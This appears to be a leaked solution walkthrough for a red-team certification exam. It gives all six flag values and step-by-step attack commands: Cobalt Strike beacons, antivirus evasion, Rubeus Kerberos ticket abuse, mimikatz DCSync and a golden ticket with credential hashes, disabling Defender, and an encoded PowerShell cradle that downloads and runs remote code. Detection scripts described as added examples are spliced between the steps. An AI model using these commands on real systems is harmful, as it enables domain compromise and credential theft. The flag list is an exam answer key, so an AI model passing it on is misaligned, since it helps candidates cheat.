CRTO July2022 6flags

Uploaded by

soheil hashemi

FLAG 1 - 7b5362c02c78f6b114e5cebd24eb2bf0
FLAG 2 - eb37d7b24ae6d4640558304db2b23099
FLAG 3 - ec05148d3a2e0f3b044b4573cb84674e
FLAG 4 - d302622334f652167456d17fa0596cff
FLAG 5 - 9dfe6f3301f3a3f3660f21878e7b6d9f
FLAG 6 - 9636a983e927a4fa950f58759cc34912

CONNECTING TO THE EXAM

cd /opt/cobaltstrike

1- ./teamserver <IP> Passw0rd!

CREATE LISTENERS – 3 listeners

1- HTTP 80
2- SMB 445 -- FOR LATERAL MOVEMENT
3- TCP_LOCAL 1337

Starting the first instance.

1- IN KALI ATTACKING MACHINE –

HOST YOUR MALICIOUS PAYLOAD –

IN VICTIM MACHINE WINDOWS –

Download the payload:

iwr -uri http://10.10.100.135:8080/gethere.exe -outfile c:\users\consultant\gethere.exe

Run the payload with:

cmd.exe /c .\gethere.exe

You will get your initial beacon in Cobalt Strike.


BYPASS AMSI USING ARTIFACT IN KALI
ls -l dist-pipe
ls -l src-common/

EDIT bypass-pipe.c (the start() function; pipename is declared elsewhere in the file):

void start(HINSTANCE mhandle) {
    /* switched from snprintf... as some A/V product was flagging based on the function *sigh* */
    /* the nine %c codes spell "\\.\pipe\"; the rest of the name replaces the default pipe name */
    sprintf(pipename, "%c%c%c%c%c%c%c%c%cs<YOURNAME>-%d-<HERE>", 92, 92, 46, 92, 112, 105, 112, 101, 92,
            (int)(GetTickCount() % 9898));

    /* start our server and our client */
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&server_thread, (LPVOID) NULL, 0, NULL);
    client_thread(NULL);
}

Open build.sh and add a # in front of build_Artifcacts.

Run build.sh.

TO CHECK THAT THE CHANGES WORK, RUN A THREATCHECK SCAN

ON WINDOWS ATTACKING MACHINE –

Go to C:\Tools\Cobaltstrike\artifact-kit\dist-pipe and run:

C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f artifact64svcbig.exe

It should say "No threat found!"


FIRST FLAG –

cd C:/Program Files/Red Team Ops/

upload C:\Payloads\RTO.exe

run sc start rtoTestSvc

run netstat -anp tcp

If your listener port 1337 shows up as listening, you can connect to it:

connect localhost 1337

You will get a new beacon running as svc_test (the * after the name marks a high-integrity beacon). Interact with it:

run whoami

run net localgroup administrators CHILD\consultant /add

powerpick Get-Content C:\Users\Administrators\Desktop\flag1.txt

GET THE FLAG

FLAG 2 –

Get an elevated SYSTEM beacon from the last beacon with:

elevate svc-exe tcp-local

Now interact with the newly opened beacon:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe triage

COPY THE LUID OF svc_test

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe dump /luid:<YOUR LUID> /service:krbtgt /nowrap

COPY THE BASE64 TICKET WHICH YOU GET

NOW INTERACT WITH THE LOW-PRIVILEGE CONSULTANT BEACON AND RUN S4U:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe s4u /impersonateuser:c.boyd /msdsspn:cifs/srv.child.rto.local /user:svc_test /ticket:....= /nowrap

PASTE THE TICKET VALUE FROM THE DUMP STEP INTO /ticket:.

FROM THE OUTPUT, COPY THE S4U2PROXY TICKET (the final service ticket for cifs/srv.child.rto.local, not the S4U2Self ticket) AND WRITE IT TO A .kirbi FILE.

OPEN POWERSHELL ON THE WINDOWS ATTACKING MACHINE AND DECODE THE BASE64 TICKET:

NOTE: USE THE S4U2PROXY TICKET.

PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\srv.kirbi", [System.Convert]::FromBase64String("<PASTE THE TICKET>"))

make_token CHILD\c.boyd FakePASS

beacon> kerberos_ticket_use C:\Payloads\srv.kirbi

beacon> run klist

beacon> ls \\srv.child.rto.local\c$

NOW ON THE SYSTEM BEACON RUN –

powerpick Get-Content \\srv.child.rto.local\c$\Users\Administrator\Desktop\flag2.txt
eb37d7b24ae6d4640558304db2b23099

FLAG 3. PATH: UNCONSTRAINED DELEGATION

On the same beacon (the flag 2 path):

Impersonate user c.boyd.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor /targetuser:c.boyd /interval:10 /nowrap

NOW COPY THE TICKET THAT GETS CAPTURED.

OPEN POWERSHELL ON THE WINDOWS ATTACKING MACHINE AND RUN:

PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\dc2.kirbi", [System.Convert]::FromBase64String("<TICKET VALUE>"))

beacon> make_token CHILD\c.boyd FakePass

beacon> kerberos_ticket_use C:\Payloads\dc2.kirbi

beacon> ls \\dc-2\c$\
beacon> jump psexec64 dc-2 smb

A NEW BEACON WILL GET SPAWNED –

CLICK DC-2 AND INTERACT –

beacon> powerpick Get-Content \\dc-2\c$\Users\Administrator\Desktop\flag3.txt

ec05148d3a2e0f3b044b4573cb84674e

GET FLAG
FLAG 3.TXT - ec05148d3a2e0f3b044b4573cb84674e
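Both delegation paths above (constrained delegation with S4U in flag 2, unconstrained delegation in flag 3) leave traces a defender can check for. The Python below is an added example and is not part of the original walkthrough: it decodes the delegation bits of an account's userAccountControl value (the "sensitive and cannot be delegated" bit is the mitigation for the c.boyd case) and scans Kerberos service-ticket events (Security event 4769) for a populated Transited Services field, which the KDC fills in only for tickets obtained through constrained delegation (S4U2Proxy). The sample events, the addresses in them and the dictionary field names are constructed for the example.

```python
"""Defender-side checks for the two delegation paths walked through above.

  * decode_delegation_flags() reads the Kerberos delegation bits of an
    account's userAccountControl value.
  * find_s4u2proxy_requests() scans Security event 4769 records for a populated
    "Transited Services" field, which only appears when one account obtained a
    service ticket on behalf of another via S4U2Proxy.
"""
from typing import Dict, Iterable, List

# userAccountControl bits (ADS_USER_FLAG_ENUM) that govern Kerberos delegation.
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
NOT_DELEGATED = 0x100000                     # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition (S4U2Self)


def decode_delegation_flags(uac: int, allowed_to_delegate_to: Iterable[str] = ()) -> Dict[str, bool]:
    """Return the delegation posture of one account.

    uac is its userAccountControl integer; allowed_to_delegate_to is the
    msDS-AllowedToDelegateTo attribute (the SPNs it may delegate to).
    """
    return {
        "unconstrained": bool(uac & TRUSTED_FOR_DELEGATION),
        "constrained": bool(list(allowed_to_delegate_to)),
        "protocol_transition": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION),
        "protected": bool(uac & NOT_DELEGATED),
    }


def find_s4u2proxy_requests(events: Iterable[Dict[str, str]],
                            approved_delegators: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Flag 4769 events whose Transited Services field is populated.

    Each hit names the impersonated account, the target service and the
    delegating account, and whether that delegator is on the approved list.
    Windows writes "-" into the field when it is empty.
    """
    approved = {a.lower() for a in approved_delegators}
    hits = []
    for ev in events:
        transited = ev.get("TransitedServices", "-").strip()
        if transited in ("", "-"):
            continue
        delegator = transited.split("@", 1)[0].lower()
        hits.append({
            "impersonated": ev.get("AccountName", ""),
            "target_service": ev.get("ServiceName", ""),
            "client_address": ev.get("ClientAddress", ""),
            "delegator": transited,
            "approved": delegator in approved,
        })
    return hits


# Constructed sample events modelled on the flag 2 path: svc_test (constrained
# delegation to cifs/srv.child.rto.local) requests a ticket as c.boyd. Field
# names follow the 4769 event layout but the values are made up.
SAMPLE_4769_EVENTS = [
    {"AccountName": "consultant@CHILD.RTO.LOCAL", "ServiceName": "SRV$",
     "ClientAddress": "::ffff:10.10.120.10", "TransitedServices": "-"},
    {"AccountName": "c.boyd@CHILD.RTO.LOCAL", "ServiceName": "SRV$",
     "ClientAddress": "::ffff:10.10.120.10", "TransitedServices": "svc_test@CHILD.RTO.LOCAL"},
]

if __name__ == "__main__":
    # NORMAL_ACCOUNT (0x200) plus the delegation bit of interest, as illustration.
    print(decode_delegation_flags(0x200 | TRUSTED_FOR_DELEGATION))
    print(decode_delegation_flags(0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION, ["cifs/srv.child.rto.local"]))
    for hit in find_s4u2proxy_requests(SAMPLE_4769_EVENTS):
        print(hit)
```

The approved-delegator list is the allow-list a SOC maintains of accounts that legitimately hold msDS-AllowedToDelegateTo; any other delegator, or any hit whose impersonated account is privileged, is worth an alert.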

FLAG 4 – GOLDEN TICKET ATTACK

beacon> powershell Set-MpPreference -DisableRealTimeMonitoring $true

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

beacon> powerpick get-domainsid -domain rto.local

beacon> powerpick get-domainsid -domain child.rto.local

beacon> mimikatz lsadump::dcsync /all /csv

beacon> mimikatz kerberos::golden /user:administrator /domain:child.rto.local /sid:S-1-5-21-1886337448-2504686659-850325809 /krbtgt:a7431956a5140b39e732fe1936605ae0 /sids:S-1-5-21-2323903455-1895497758-3703895482-519 /ptt

beacon> ls \\dc-1.rto.local\c$\

beacon> jump psexec64 dc-1.rto.local smb

beacon> run net localgroup Administrators CHILD\consultant /add
beacon> run net localgroup administrators
beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag4.txt

FLAG4.TXT - d302622334f652167456d17fa0596cff
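The golden ticket above works across the trust because /sids: appends the parent domain's Enterprise Admins SID (RID 519) to a ticket for a child.rto.local account, and the child-to-parent trust inside a forest does not filter SIDs. The Python below is an added example, not part of the original walkthrough: it does the comparison the trust does not, checking the group SIDs of a logon (as recorded in the Group Membership audit event, 4627, when that subcategory is enabled on the domain controller) for SIDs whose domain part differs from the account's own domain and whose RID is a privileged well-known one. The two domain SIDs come from the ticket above; the group list is constructed.

```python
"""Spot a logon whose group SIDs include a privileged group from another domain,
the trace left by a golden ticket forged with an extra SID as in flag 4 above."""
from typing import List, Optional, Tuple

# Well-known RIDs that grant domain- or forest-wide administrative control.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid: str) -> Tuple[Optional[str], Optional[int]]:
    """Split a domain SID (S-1-5-21-a-b-c[-rid]) into (domain_sid, rid).

    Returns (None, None) for SIDs outside the S-1-5-21 domain authority,
    e.g. BUILTIN\\Administrators S-1-5-32-544 or NT AUTHORITY SIDs.
    """
    parts = sid.strip().split("-")
    if parts[:4] != ["S", "1", "5", "21"] or len(parts) not in (7, 8):
        return None, None
    if not all(p.isdigit() for p in parts[4:]):
        return None, None
    domain = "-".join(parts[:7])
    rid = int(parts[7]) if len(parts) == 8 else None
    return domain, rid


def find_foreign_privileged_sids(account_domain_sid: str,
                                 group_sids: List[str]) -> List[Tuple[str, str]]:
    """Return (sid, group_name) for group SIDs from another domain with a privileged RID.

    account_domain_sid may be the bare domain SID or the account's full SID.
    """
    own_domain, _ = split_sid(account_domain_sid)
    findings = []
    for sid in group_sids:
        domain, rid = split_sid(sid)
        if domain is None or rid is None or domain == own_domain:
            continue  # non-domain SID, bare domain SID, or the account's own domain
        if rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid]))
    return findings


# Constructed logon group list, using the two domain SIDs from the golden
# ticket above: a child.rto.local account whose groups include the parent
# domain's Enterprise Admins SID that only a forged PAC would carry.
CHILD_DOMAIN_SID = "S-1-5-21-1886337448-2504686659-850325809"
PARENT_DOMAIN_SID = "S-1-5-21-2323903455-1895497758-3703895482"
SAMPLE_LOGON_GROUPS = [
    CHILD_DOMAIN_SID + "-513",   # Domain Users (child)
    CHILD_DOMAIN_SID + "-512",   # Domain Admins (child): own domain, not flagged here
    "S-1-5-32-544",              # BUILTIN\Administrators
    PARENT_DOMAIN_SID + "-519",  # Enterprise Admins (parent): injected via /sids:
]

if __name__ == "__main__":
    for sid, name in find_foreign_privileged_sids(CHILD_DOMAIN_SID, SAMPLE_LOGON_GROUPS):
        print(f"ALERT foreign privileged SID {sid} ({name})")
```

A genuine child-domain account can only carry a parent-domain group SID through real membership or through SID history, both of which are rare enough to review by hand; the check is most useful on the parent domain controllers, where the forged ticket is actually presented.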
FLAG 5 –

After the initial connection and adding our user to the admin group:

beacon> jump psexec64 dc-1.rto.local smb

FOR A STABLE CONNECTION ON DC-1 -

INJECT INTO NOTEPAD.EXE

beacon> execute notepad.exe

beacon> inject 3852 x64 tcp-local

beacon> mimikatz lsadump::dcsync /all /csv

beacon> mimikatz sekurlsa::pth /user:j.frazier /domain:rto.local /ntlm:c13f49341f28a793171685becf613937 /run:"powershell -w hidden"

beacon> steal_token 2060

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'whoami' -RawResult

beacon> socks 9050

beacon> rportfwd 8080 10.10.100.135 80

beacon> rportfwd 4444 windows/beacon_reverse_tcp

beacon> run netsh advfirewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444

(the command above is missing the "firewall" keyword; the corrected form follows)

beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAMAA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell Set-MpPreference -DisableRealTimeMonitoring $true' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAMAA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAMAA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> run whoami

beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag5.txt

[*] Tasked beacon to run: Get-Content C:\Users\Administrator\Desktop\flag5.txt (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f

beacon> run netsh advfirewall firewall add rule name="Allow 8080" dir=in action=allow protocol=TCP localport=8080

beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444

beacon> rportfwd 8080 10.10.100.135 80
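The encoded command pushed through Invoke-SQLOSCmd above is what a defender sees in process-creation telemetry on sql.rto.local (Sysmon event 1, or Security event 4688 with command-line auditing). powershell.exe's -EncodedCommand switch (accepted as any prefix from -e to -EncodedCommand, or as -ec) takes the base64 of the UTF-16LE command text, so the blob decodes offline. The Python below is an added example, not part of the original walkthrough: it pulls encoded arguments out of a command line, decodes them and matches both the decoded text and the outer command line against the usual download-cradle indicators. The sample command line is the one from the flag 5 steps with the wrapped blob rejoined; the indicator list and the regexes are the example's own.

```python
"""Decode -EncodedCommand arguments and score a command line for download-cradle indicators."""
import base64
import binascii
import re
from typing import Dict, List

# -encodedcommand and every shorter prefix down to -e, plus the separate -ec alias.
_ENC_SWITCHES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1)) + "|ec"
ENCODED_ARG_RE = re.compile(rf"(?<!\w)-(?:{_ENC_SWITCHES})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)

# (label, pattern) pairs for the building blocks of a PowerShell download cradle.
CRADLE_INDICATORS = (
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("webclient", r"net\.webclient"),
    ("download", r"downloadstring|downloadfile|downloaddata"),
    ("web-request", r"invoke-webrequest|\biwr\b|invoke-restmethod"),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
)


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument: base64 over UTF-16LE text."""
    compact = re.sub(r"\s+", "", blob)            # tolerate blobs wrapped across lines
    compact += "=" * (-len(compact) % 4)          # restore padding dropped by some loggers
    raw = base64.b64decode(compact, validate=True)
    return raw.decode("utf-16-le")


def analyze_command_line(command_line: str) -> Dict[str, object]:
    """Decode any encoded arguments and report cradle indicators and URLs."""
    decoded: List[str] = []
    for blob in ENCODED_ARG_RE.findall(command_line):
        try:
            decoded.append(decode_encoded_command(blob))
        except (binascii.Error, UnicodeDecodeError):
            continue                              # base64-shaped text that is not a real encoded command
    haystack = " ".join([command_line] + decoded)
    indicators = [label for label, pat in CRADLE_INDICATORS
                  if re.search(pat, haystack, re.IGNORECASE)]
    return {
        "decoded": decoded,
        "indicators": indicators,
        "urls": URL_RE.findall(haystack),
        # Execution of fetched content is the combination worth alerting on.
        "suspicious": "invoke-expression" in indicators
                      and ("download" in indicators or "web-request" in indicators),
    }


# The flag 5 command line from above, with the wrapped blob rejoined into one token.
SAMPLE_COMMAND_LINE = (
    "powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w hidden -enc "
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3"
    "AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAMAA0ADoA"
    "OAAwADgAMAAvAHMAJwApACkA"
    "' -RawResult"
)

if __name__ == "__main__":
    report = analyze_command_line(SAMPLE_COMMAND_LINE)
    for text in report["decoded"]:
        print("decoded:", text)
    print("indicators:", report["indicators"])
    print("urls:", report["urls"])
    print("suspicious:", report["suspicious"])
```

Matching the outer command line as well as the decoded text is deliberate: the hidden-window switch and the fact that the process was spawned by the SQL Server service (visible in the parent process of the same event) are part of the signal, and neither appears inside the blob.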

FLAG 6 –

beacon> powerpick mkdir C:/temp

beacon> upload C:\Payloads\NAME.EXE

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\temp\NAME.exe

beacon> connect localhost 1337

beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag6.txt

FLAG 6 - 9636a983e927a4fa950f58759cc34912

in the powershell – enter
